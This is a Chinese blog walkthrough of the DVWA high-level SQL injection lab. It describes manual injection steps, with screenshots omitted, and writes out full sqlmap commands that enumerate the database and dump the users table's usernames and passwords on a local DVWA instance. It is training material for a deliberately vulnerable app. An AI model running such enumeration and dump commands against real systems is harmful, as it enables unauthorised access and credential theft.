首页 > 数据库 >[网络安全]DVWA之SQL注入—High level解题详析

[网络安全]DVWA之SQL注入—High level解题详析

时间:2023-05-02 22:12:45浏览次数:45  
标签:详析 sqlmap level -- DVWA dvwa SQL 注入

免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。
DVWA请读者自行安装,本文不再赘述。
由于high level仅涉及简单攻击知识,本文不再详细解释。建议读者在理解SQL注入原理,熟悉low level、medium level解题姿势后再观看本文。
具体原理及姿势参见:
[网络安全]DVWA之SQL注入—low level解题详析

[网络安全]DVWA之SQL注入—medium level解题详析

[网络安全]以留言板项目渗透实例带你入门sqlmap

手工注入

判断注入类型

在这里插入图片描述在这里插入图片描述由以上两个回显可知,该注入类型为字符型注入。

判断注入点个数

在这里插入图片描述在这里插入图片描述由以上两个回显可知,注入点个数为两个。

爆库名

在这里插入图片描述

爆表名

在这里插入图片描述

爆列名

在这里插入图片描述

爆字段

在这里插入图片描述

sqlmap注入

查看是否存在注入点

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1"
在这里插入图片描述
在这里插入图片描述存在注入点。

爆库名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" --dbs
在这里插入图片描述
在这里插入图片描述

爆表名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa --tables
在这里插入图片描述
在这里插入图片描述

爆列名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -t users --columns
在这里插入图片描述
在这里插入图片描述-D、-T为大写或小写均可

爆字段

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -T users -C user,password --dump
在这里插入图片描述
在这里插入图片描述

总结

以上为DVWA之SQL注入—high level解题简析,使用手工注入及sqlmap分享SQL攻击知识。
后续会分享DVWA之SQL注入—Impossible level代码审计。
我是秋说,我们下次见。

标签:详析,sqlmap,level,--,DVWA,dvwa,SQL,注入
From: https://www.cnblogs.com/qiushuo/p/17368389.html

相关文章

  • DVWA之SQL注入—Impossible level代码审计
    Impossiblelevel源代码<?phpif(isset($_GET['Submit'])){//CheckAnti-CSRFtokencheckToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');//Getinput$id=$_GET......
  • DVWA-部署
    前言在学习web安全的过程中,靶场是必不可少的,毕竟在计算机界,任何理论知识都不如实操同时也不可能提供真实企业环境去练习,这个时候靶场就起到极其重要的作用。靶场就是人为提供的带有安全漏洞的服务,每一个学习者都可以在本地快速搭建来实操,回溯漏洞的发生原理以及操作方式。DVWA靶......
  • 【图文详解】一文全面彻底搞懂HBase、LevelDB、RocksDB等NoSQL背后的存储原理:LSM-tree
    LSM树广泛用于数据存储,例如RocksDB、ApacheAsterixDB、Bigtable、HBase、LevelDB、ApacheAccumulo、SQLite4、Tarantool、WiredTiger、ApacheCassandra、InfluxDB和ScyllaDB等。在这篇文章中,我们将深入探讨LogStructuredMergeTree,又名LSM树:许多高度可扩展的NoSQL分......
  • Kivy中的Level组件提供了一种在屏幕上显示动态的、可交互的图形的方法
    source:必需参数,指定要显示的图像的路径。支持的图像格式包括PNG、JPEG和GIF。size:可选参数,指定Level组件的大小。默认为None,即使用图像的原始大小。可以是一个二元组(width,height)或一个字符串形式的尺寸,如'100dp'。pos:可选参数,指定Level组件的位置。默......
  • CentOS7修改开机启动模式:命令行模式(runlevel=3)
    1.打开文件/etc/inittab: sudo/etc/inittab显示当前的runlevel:systemctlget-default设置默认的运行级别:systemcltset-defaultXX.target。XX可以是multi-user或者graphical按照提示在终端中执行命令:systemctlset-defaultmulti-user.target注意:按照inittab文件中的提......
  • pwn | jarvisoj_level3_x64
    pwn|jarvisoj_level3_x64x64ret2libcexp:frompwnimport*fromLibcSearcherimport*context.log_level='debug'p_vuln=0x00000000004005E6p_main=0x000000000040061Ap_str=0x00000000004006DC#p=process('./level3_x64')p=......
  • DVWA(全级别通关教程详解)
    BruteForce(burp密码爆破 章节省略)CommandInjection1. 解决乱码问题 找到(phpstudy_pro/WWW/DVWA/dvwa/includes  下的page.php的文件,将utf-8字符全部改为gb2312字符)2. 输入自己想知道的信息的命令,eg:127.0.0.1&ipconfig127.0.0.1&systeminfo127.0.0.1&dirCSRF1......
  • SQL注入漏洞--DVWA
    怎么判断sql注入漏洞呢?后台执行的SQL语句为SELECTfirst_name,last_nameFROMusersWHEREuser_id='$id';($id:用户输入的内容)用户输入的数据为:1'and1=1#这时SQL语句发生变化,在原有查询完成后会判断1=1(这明显是对的),如果判断正确才会有输出[#作用是注释(移除)后续SQL语......
  • dvwa存储型xss
    1、低级别查看服务端提示代码,直接返回未做处理。<script>alert(/xss/)</script>2、中级别查看服务端提示代码,使用htmlspecialchars函数对参数message进行实体编码,使用str_replace函数对参数name进行替代<script>为”。解决:从name参数着手,使用script大小写混杂或者其他标签......
  • dvwa使用
    1、介绍dvwa是一个基于php+mysql的web漏洞靶场项目,用户可以将其部署在本地,模拟测试和学习。可以是本地虚拟机安装,也可以考虑本地phpstudy搭建,但不建议将其部署到公共网络的主机上。phpstudy安装dvwa–学习狗2、漏洞类型BruteFroce爆破CommandInjection命令注入CSRF......